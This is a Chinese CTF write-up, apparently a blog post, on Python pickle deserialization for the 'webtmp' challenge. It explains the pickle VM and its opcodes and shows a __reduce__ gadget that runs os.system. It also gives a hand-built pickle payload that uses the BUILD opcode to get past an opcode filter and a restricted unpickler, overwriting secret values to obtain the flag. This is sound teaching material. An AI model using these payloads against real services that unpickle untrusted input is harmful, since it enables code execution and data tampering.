pickle反序列化--高校抗“疫”网络安全分享赛
What is Pickle?
简介
前几天看到了p牛讲的pickle反序列化的文章,比赛正好出了,给了一个实战加深理解的机会。那么首先,我得知道pickle反序列化是什么东西。
pickle是一门栈语言,基于一个轻量的 PVM(Pickle Virtual Machine)。而PVM则主要包含指令处理器、stack和memo。
- 指令处理器:处理OPcode和参数,对其进行解析。最后留在栈顶的值将作为反序列化对象返回。
- stack:用来临时存储数据,参数和对象,由python的list实现,可理解为计算机的内存
- memo:为PVM整个生命周期提供存储,由python的dict实现,可理解为计算机的硬盘存储
指令集
当前用于 pickle 的协议共有 5 种。使用的协议版本越高,读取生成的 pickle 所需的 Python 版本就要越新。
- v0 版协议是原始的 “人类可读” 协议,并且向后兼容早期版本的 Python。
- v1 版协议是较早的二进制格式,它也与早期版本的 Python 兼容。
- v2 版协议是在 Python 2.3 中引入的。它为存储 new-style class 提供了更高效的机制。欲了解有关第 2 版协议带来的改进,请参阅 PEP 307。
- v3 版协议添加于 Python 3.0。它具有对 bytes 对象的显式支持,且无法被 Python 2.x 打开。这是目前默认使用的协议,也是在要求与其他 Python 3 版本兼容时的推荐协议。
- v4 版协议添加于 Python 3.4。它支持存储非常大的对象,能存储更多种类的对象,还包括一些针对数据格式的优化。有关第 4 版协议带来改进的信息,请参阅 PEP 3154。
指令集皆可在pickle源码中查询,下面给大家贴出来(比较长,可跳过
# Pickle opcodes. See pickletools.py for extensive docs. The listing
# here is in kind-of alphabetical order of 1-character pickle code.
# pickletools groups them by purpose.
MARK = b'(' # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING= b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call __setstate__ or __dict__.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding
TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py
# Protocol 2
PROTO = b'\x80' # identify pickle protocol
NEWOBJ = b'\x81' # build object by applying cls.__new__ to argtuple
EXT1 = b'\x82' # push object from extension registry; 1-byte index
EXT2 = b'\x83' # ditto, but 2-byte index
EXT4 = b'\x84' # ditto, but 4-byte index
TUPLE1 = b'\x85' # build 1-tuple from stack top
TUPLE2 = b'\x86' # build 2-tuple from two topmost stack items
TUPLE3 = b'\x87' # build 3-tuple from three topmost stack items
NEWTRUE = b'\x88' # push True
NEWFALSE = b'\x89' # push False
LONG1 = b'\x8a' # push long from < 256 bytes
LONG4 = b'\x8b' # push really big long
# Protocol 3 (Python 3.x)
BINBYTES = b'B' # push bytes; counted binary string argument
SHORT_BINBYTES = b'C' # " " ; " " " " < 256 bytes
# Protocol 4
SHORT_BINUNICODE = b'\x8c' # push short string; UTF-8 length < 256 bytes
BINUNICODE8 = b'\x8d' # push very long string
BINBYTES8 = b'\x8e' # push very long bytes string
EMPTY_SET = b'\x8f' # push empty set on the stack
ADDITEMS = b'\x90' # modify set by adding topmost stack items
FROZENSET = b'\x91' # build frozenset from topmost stack items
NEWOBJ_EX = b'\x92' # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL = b'\x93' # same as GLOBAL but using names on the stacks
MEMOIZE = b'\x94' # store top of the stack in memo
FRAME = b'\x95' # indicate the beginning of a new frame
pickle序列化
pickle代码主要依靠__reduce__魔术方法和手撸
-
__reduce__方法
class exp(object): def __reduce__(self): s = r"""touch /tmp/success""" return (os.system, (s,)) print(pickle.dumps(exp(), protocol=0)) >>>b'cnt\nsystem\np0\n(Vtouch /tmp/success\np1\ntp2\nRp3\n.'
-
手撸代码,可以依据pickletools进行调试分析
$python -m pickletools pickle.txt 0: c GLOBAL 'nt system' # 向栈顶压入`posix.system`这个可执行对象 11: p PUT 0 # 将这个对象存储到memo的第0个位置 14: ( MARK # 压入一个元组的开始标志 15: V UNICODE 'touch /tmp/success' # 压入一个字符串 35: p PUT 1 # 将这个字符串存储到memo的第1个位置 38: t TUPLE (MARK at 14) # 将由刚压入栈中的元素弹出,再将由这个元素组成的元组压入栈中 39: p PUT 2 # 将这个元组存储到memo的第2个位置 42: R REDUCE # 从栈上弹出两个元素,分别是可执行对象和元组,并执行,结果压入栈中 43: p PUT 3 # 将栈顶的元素(也就是刚才执行的结果)存储到memo的第3个位置 46: . STOP # 结束 highest protocol among opcodes = 0 # v0协议 >>>b'''cnt system p0 (Vtouch /tmp/success p1 tp2 Rp3 .'''
注意:PVM 指令的书写规范
(1)操作码是单字节的
(2)带参数的指令用换行符定界
题目分析
题目名字为webtmp,以下是题目源码
import base64
import io
import sys
import pickle
from flask import Flask, Response, render_template, request
import secret
app = Flask(__name__)
class Animal:
def __init__(self, name, category):
self.name = name
self.category = category
def __repr__(self):
return f'Animal(name={self.name!r}, category={self.category!r})'
def __eq__(self, other):
return type(other) is Animal and self.name == other.name and self.category == other.category
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module == '__main__':
return getattr(sys.modules['__main__'], name)
raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))
def restricted_loads(s):
return RestrictedUnpickler(io.BytesIO(s)).load()
def read(filename, encoding='utf-8'):
with open(filename, 'r', encoding=encoding) as fin:
return fin.read()
@app.route('/', methods=['GET', 'POST'])
def index():
if request.args.get('source'):
return Response(read(__file__), mimetype='text/plain')
if request.method == 'POST':
try:
pickle_data = request.form.get('data')
if b'R' in base64.b64decode(pickle_data):
return 'No... I don\'t like R-things. No Rabits, Rats, Roosters or RCEs.'
else:
result = restricted_loads(base64.b64decode(pickle_data))
if type(result) is not Animal:
return 'Are you sure that is an animal???'
correct = (result == Animal(secret.name, secret.category))
return render_template('unpickle_result.html', result=result, pickle_data=pickle_data, giveflag=correct)
except Exception as e:
print(repr(e))
return "Something wrong"
sample_obj = Animal('giaogiao', 'Giao')
pickle_data = base64.b64encode(pickle.dumps(sample_obj)).decode()
return render_template('unpickle_page.html', sample_obj=sample_obj, pickle_data=pickle_data)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
很容易发现两个关键点
- pickle反序列化,但是find_class里面module限制了只能sys.module['__main__']
- 当correct为true时,可以获得flag
那么从判断条件来说,我们需要反序列化出一个animal对象,其属性分别等于secret中的name和category,然后便可以通过验证,拿到flag
题目中secret.py没有给出,不过可以不难猜出其大概长什么样
# secret.py
name="xxx"
category="?????"
#test
a = sys.modules['__main__'].secret.name
print(a) # xxx
接下来就有几种思路了
- 获取secret中的name和category值,然后用其创建animal对象
- 覆盖name和category的值,然后用自己覆盖的值去创建animal对象
第一种方法,经过各种尝试,无法实现__main__.secret.name的方式
那么考虑第二种思路,在翻阅pickle的各种协议文档时,在协议2文档中发现
可以通过反序列化更改其属性值 对应操作码为
BUILD = b'b' # call __setstate__ or __dict__.update()
这下思路就比较清晰了,先覆盖属性值,再生成animal对象,那么接下来就开始手撸pickle码
开始构造
# 第一部分payload,传入字典覆盖属性值
payload_1 = b'''c__main__
secret
}S'name'
S'xxxxx'
sS'category'
S'yyyyy'
sb.'''
# 第二部分payload,构造对象
exp = Animal("xxxxx","yyyyy")
payload_2 = pickle.dumps(exp)
#b'''\x80\x03c__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05X\x05\x00\x00\x00yyyyyq\x06ub.'''
# 合并payload
payload = b'''c__main__
secret
}S'name'
S'xxxxx'
sS'category'
S'yyyyy'
sbc__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00xxxxxq\x04X\x08\x00\x00\x00categoryq\x05X\x05\x00\x00\x00yyyyyq\x06ub.'''
print(base64.b64encode(payload))
#Y19fbWFpbl9fCnNlY3JldAp9UyduYW1lJwpTJ3h4eHh4JwpzUydjYXRlZ29yeScKUyd5eXl5eScKc2JjX19tYWluX18KQW5pbWFsCnEAKYFxAX1xAihYBAAAAG5hbWVxA1gFAAAAeHh4eHhxBFgIAAAAY2F0ZWdvcnlxBVgFAAAAeXl5eXlxBnViLg==
Getflag
相关链接:
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 聊一聊 操作系统蓝屏 c0000102 的故障分析
· SQL Server 内存占用高分析
· .NET Core GC计划阶段(plan_phase)底层原理浅谈
· .NET开发智能桌面机器人:用.NET IoT库编写驱动控制两个屏幕
· 用纯.NET开发并制作一个智能桌面机器人:从.NET IoT入门开始
· 我干了两个月的大项目,开源了!
· 推荐一款非常好用的在线 SSH 管理工具
· 聊一聊 操作系统蓝屏 c0000102 的故障分析
· 千万级的大表,如何做性能调优?
· .NET周刊【1月第1期 2025-01-05】